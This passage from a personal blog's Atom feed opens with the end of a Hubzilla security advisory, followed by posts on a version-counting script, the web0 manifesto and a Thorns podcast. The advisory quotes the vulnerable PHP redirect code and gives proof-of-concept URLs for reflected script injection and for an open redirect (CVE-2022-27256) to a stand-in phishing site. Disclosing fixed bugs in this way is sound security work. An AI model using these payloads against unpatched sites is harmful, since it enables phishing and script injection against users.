&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Manage.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Network.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Photos.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Profiles.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;View&#x2F;tpl&#x2F;settings_module.tpl&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;proof-of-concept-1&quot;&gt;Proof of concept:&lt;&#x2F;h3&gt;
&lt;pre&gt;&lt;code&gt;https:&amp;#x2F;&amp;#x2F;example.com&amp;#x2F;settings&amp;#x2F;calendar&amp;#x2F;?f=&amp;amp;rpath=https:&amp;#x2F;&amp;#x2F;example.com&amp;#x2F;cdav&amp;#x2F;calendar&amp;#x27;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;#x27;boom&amp;#x27;)&amp;lt;&amp;#x2F;script&amp;gt;
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;cve-2022-27256-open-redirect-in-hubzilla-settings-modules&quot;&gt;CVE-2022-27256: Open Redirect in Hubzilla settings modules&lt;&#x2F;h2&gt;
&lt;p&gt;When submitting a change in one of the affected settings modules above, the
&lt;code&gt;rpath&lt;&#x2F;code&gt; query parameter is is passed on as a POST parameter and used blindly to
redirect after submitting the form, leading to an open redirect vulnerability.&lt;&#x2F;p&gt;
&lt;p&gt;An attacker can use this to trick a victim to give them sensitive information
by first directing them to change a setting and then redirect to an attacker
controlled site after the victim submits the changes. For example by making
malicious site look like the Hubzilla login form and convincing the victim they
need to authenticate to save the changes.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;details-2&quot;&gt;Details&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;Application: Hubzilla&lt;&#x2F;li&gt;
&lt;li&gt;Component: Settings modules&lt;&#x2F;li&gt;
&lt;li&gt;Vulnerable versions: Any version before 7.2&lt;&#x2F;li&gt;
&lt;li&gt;Fixed in version: 7.2&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;classification-2&quot;&gt;Classification&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;CWE: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cwe.mitre.org&#x2F;data&#x2F;definitions&#x2F;601.html&quot;&gt;CWE-601&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Score: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.first.org&#x2F;cvss&#x2F;calculator&#x2F;3.1#CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:R&#x2F;S:C&#x2F;C:L&#x2F;I:N&#x2F;A:N&quot;&gt;4.7&lt;&#x2F;a&gt; (Medium)&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Vector: CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:R&#x2F;S:C&#x2F;C:L&#x2F;I:N&#x2F;A:N&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;relevant-code-2&quot;&gt;Relevant code:&lt;&#x2F;h3&gt;
&lt;p&gt;Example from &lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Calendar.php&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre data-linenos data-lang=&quot;php&quot; class=&quot;language-php &quot;&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;21&lt;&#x2F;td&gt;&lt;td&gt;	  if($_POST[&amp;#x27;rpath&amp;#x27;])
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;22&lt;&#x2F;td&gt;&lt;td&gt;			goaway($_POST[&amp;#x27;rpath&amp;#x27;]);
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here the POST parameter &lt;code&gt;rpath&lt;&#x2F;code&gt; is passed directly to the &lt;code&gt;goaway()&lt;&#x2F;code&gt; function,
that simply causes a redirect to the supplied URL without any further
checking.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;proof-of-concept-2&quot;&gt;Proof of concept:&lt;&#x2F;h3&gt;
&lt;pre&gt;&lt;code&gt;https:&amp;#x2F;&amp;#x2F;example.com&amp;#x2F;settings&amp;#x2F;calendar&amp;#x2F;?f=&amp;amp;rpath=https:&amp;#x2F;&amp;#x2F;evilsite.org&amp;#x2F;auth.php
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>hubzilla-versions.rb</title>
        <published>2022-04-10T00:00:00+00:00</published>
        <updated>2022-04-10T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/programming/projects/hubzilla-versions/"/>
        <id>https://volse.net/~haraldei/programming/projects/hubzilla-versions/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/programming/projects/hubzilla-versions/">&lt;p&gt;I needed a quick way to find a rough estimate of the Hubzilla versions in
active use at the moment. So I wrote a small program to fetch the info from
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;the-federation.info&#x2F;hubzilla&quot;&gt;the-federation.info&lt;&#x2F;a&gt; using their
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;the-federation.info&#x2F;graphql&quot;&gt;GraphQL endpoint&lt;&#x2F;a&gt;, and
summarizing the various versions like this:&lt;&#x2F;p&gt;
&lt;pre&gt;&lt;code&gt;:!.&amp;#x2F;hubzilla-versions.rb

Fetching results...
7.3  :  6 ( 5.77%)
7.2  : 37 (35.58%)
7.1.3:  1 ( 0.96%)
7.0.3: 18 (17.31%)
7.0.2:  4 ( 3.85%)
7.0  :  4 ( 3.85%)
6.4.2:  3 ( 2.88%)
6.4.1:  1 ( 0.96%)
6.4  :  1 ( 0.96%)
6.0.1:  6 ( 5.77%)
6.0  :  2 ( 1.92%)
5.6.1:  1 ( 0.96%)
5.4.1:  1 ( 0.96%)
5.2.2:  1 ( 0.96%)
5.1.2:  1 ( 0.96%)
5.0.8:  1 ( 0.96%)
5.0.5:  1 ( 0.96%)
4.6  :  8 ( 7.69%)
4.5  :  1 ( 0.96%)
4.4.1:  2 ( 1.92%)
4.0.3:  1 ( 0.96%)
3.8.8:  1 ( 0.96%)
3.6.1:  1 ( 0.96%)
3.2.1:  1 ( 0.96%)
----------
total: 104
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;code.volse.net&#x2F;hubzilla&#x2F;volse-hz-tools.git&#x2F;tree&#x2F;hubzilla-versions.rb&quot;&gt;The
code&lt;&#x2F;a&gt;
is of course available if you would find this useful as well, or if you want to
adapt it to your usecase.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>web0 manifesto</title>
        <published>2022-01-01T00:00:00+00:00</published>
        <updated>2022-01-01T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/web0/"/>
        <id>https://volse.net/~haraldei/web0/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/web0/">&lt;p&gt;I just signed the &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;web0.small-web.org&#x2F;&quot;&gt;web0 manifesto&lt;&#x2F;a&gt; an initiaive
by the wonderful folks of the Small Technology Foundation. The manifesto
is short, so I&#x27;ll repeat it here:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;web3 = decentralisation + blockchain + NFTs + metaverse
web0 = web3 - blockchain - NFTs - metaverse
web0 = decentralisation
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;web0 is the decentralised web.&lt;&#x2F;p&gt;
&lt;p&gt;In other words, web0 is web3 without all the corporate right-libertarian Silicon Valley bullshit.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;why&quot;&gt;Why?&lt;&#x2F;h2&gt;
&lt;p&gt;I find the entire notion that we need something based on a blockchain to make
a decentralised web completely meaningless and outright ridiculous. The web is
already decentralised, we just need to embrace the fact and get rid of the
structures that try to centralise it.&lt;&#x2F;p&gt;
&lt;p&gt;The thing is, most people today has not experienced the free decentralised web
the way it was in the mid 1990&#x27;s to the early 2000&#x27;s. Without this experience
it&#x27;s hard to imagine a web without the giant and centralised silos that have
taken over the web today.&lt;&#x2F;p&gt;
&lt;p&gt;It used to be that when you signed up for an internet connection, you got an
email address and a small &quot;home area&quot; on the ISP&#x27;s server along with it. This
meant that anyone could publish their own website in their home area, something
many people did. The &quot;home pages&quot; of various random people around the net became
it&#x27;s own genre, with it&#x27;s own conventions and style.&lt;&#x2F;p&gt;
&lt;p&gt;The web was full of these pages. Made by enthusiasts, writing about things
that interested them. Some were elaborate and had lots of content and detail,
while some were more sparse and held a promise for more later. This web of sites
were linked together by hyperlinks (or just web links today) that allowed us
to jump from one site to another, and often get a bit lost along the way.&lt;&#x2F;p&gt;
&lt;p&gt;At some point this stopped. ISP&#x27;s began to just provide an internet connection,
no email or storage space. No &quot;home area&quot;. This increased the threshold for
creating your own site or &quot;homepage&quot;. The email was handed over to the advertising
industry providing &quot;free&quot; email in exchange for snooping on your communication.&lt;&#x2F;p&gt;
&lt;p&gt;The &quot;home area&quot; or homepages were taken over first by blogs and later by social
media sites, again for &quot;free&quot; in exchange for you giving them your social graph and
relationships. (So they can know you better!)&lt;&#x2F;p&gt;
&lt;p&gt;We definitely need to redecentralize the web. But we don&#x27;t need more complexity
or a blockchain to do so. After we moved from the dial-up internet connections
we had in the early days of the web, we now have allways-on wired and soon
wireless internet in our homes.&lt;&#x2F;p&gt;
&lt;p&gt;It&#x27;s easier than ever to just keep an old (or a cheap single board) computer
running and serving your web site from it. We just need simple software that
makes the setup and maintenance of the site and computer easy.&lt;&#x2F;p&gt;
&lt;p&gt;Now imagine a web where we all have our own sites with our own content running
from our own home internet connection? We can link to each other, we can share
and collaborate and communicate with each other. Safely and with complete control
over who we share what with. All from our own sites, all without any big
centralised service in the middle.&lt;&#x2F;p&gt;
&lt;p&gt;This is the web. Not any future web, but the web today. Quite frankly, the web
as it has always been.&lt;&#x2F;p&gt;
&lt;p&gt;We don&#x27;t need any blockchain to decentralise the web. We just need to use the
web we have today!&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Thorns: Making a podcast</title>
        <published>2021-11-08T00:00:00+00:00</published>
        <updated>2022-01-08T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/music/thorns/making-a-podcast/"/>
        <id>https://volse.net/~haraldei/music/thorns/making-a-podcast/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/music/thorns/making-a-podcast/">

        
            
                
                
    
	
	
	
		
		
	
	
	
	
		
	

&lt;figure class=&quot;figure} prefer-left&quot;&gt;
    
	&lt;img src=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;processed_images&#x2F;05423F85-B7DF-455E-9408-4EF4F8DA1B7C.3ea3102c08c309c3.jpg&quot;
			alt=&quot;Three bearded men in front of a wooden wall.&quot;
			&gt;
    
  
	&lt;figcaption class=&quot;caption&quot;&gt;
		&lt;p&gt;Marius Vold, Snorre Ruch and Harald Eilertsen of the original lineup of Thorns. Together in
a photo for the first time since the early 1990s! (Photo by Thomas Eriksen)&lt;&#x2F;p&gt;

        
	&lt;&#x2F;figcaption&gt;
  
&lt;&#x2F;figure&gt;
&lt;p&gt;This weekend Marius, me and Snorre met up with
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.morkisebakke.no&#x2F;&quot;&gt;Mork&lt;&#x2F;a&gt; main man Thomas Eriksen for making an
episode of &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.morkisebakke.no&#x2F;category&#x2F;podcast&quot;&gt;his podcast&lt;&#x2F;a&gt;. That
is, I met up with Marius and Thomas in Oslo and then we drove up to where
Snorre lives and stayed at his place for the weekend.  Drinking, smoking and
sharing lots of music and memories.&lt;&#x2F;p&gt;
&lt;p&gt;It&#x27;s always hard to say anything about how the episode turns out, but we
had a good time, and I think we covered a lot of things that will be interesting
to black metal fans in general and Thorns fans in particular.&lt;&#x2F;p&gt;
&lt;p&gt;And of course it was a great to meet up and see Snorre again. We live quite far
from each other, so we don&#x27;t get to see each other as often anymore. Would have been
great to have Bård there too. Hopefully next time!&lt;&#x2F;p&gt;


        
            
        
            
                
                
    
	
	
	
		
		
	
	
	
	

&lt;figure class=&quot;figure}&quot;&gt;
    
	&lt;img src=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;processed_images&#x2F;158EF0D2-CE0C-4CCA-B6EC-3CC0CA75456C.723886425b21ad6e.jpg&quot;
			alt=&quot;some people, microphones and a computer set up for making a podcast.&quot;
			&gt;
    
  
	&lt;figcaption class=&quot;caption&quot;&gt;
		&lt;p&gt;This is what making a podcast looks like. (Photo by Thomas Eriksen)&lt;&#x2F;p&gt;

        
	&lt;&#x2F;figcaption&gt;
  
&lt;&#x2F;figure&gt;
&lt;p&gt;&lt;strong&gt;Update: Jan 8, 2022:&lt;&#x2F;strong&gt;
Both episodes of the podcast is available now, the &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.morkisebakke.no&#x2F;podcast&#x2F;2021&#x2F;11&#x2F;ep-30-on-the-road-1-feat-marius-vold-harald-eilertsen-both-ex-thorns&quot;&gt;Roadtrip&lt;&#x2F;a&gt;
which we recorded in the car on the way, and the &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.morkisebakke.no&#x2F;podcast&#x2F;2021&#x2F;11&#x2F;ep-31-snorre-ruch-thorns&quot;&gt;actual episode about&#x2F;with Snorre&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;It was great fun to do both of these, especially the &quot;proper&quot; episode where we
went on a serious trip down memory lane and talked about the earliest days of
our musical journey, and what eventually became Thorns.&lt;&#x2F;p&gt;
&lt;p&gt;Enjoy!&lt;&#x2F;p&gt;
</content>
        
    </entry>
</feed>
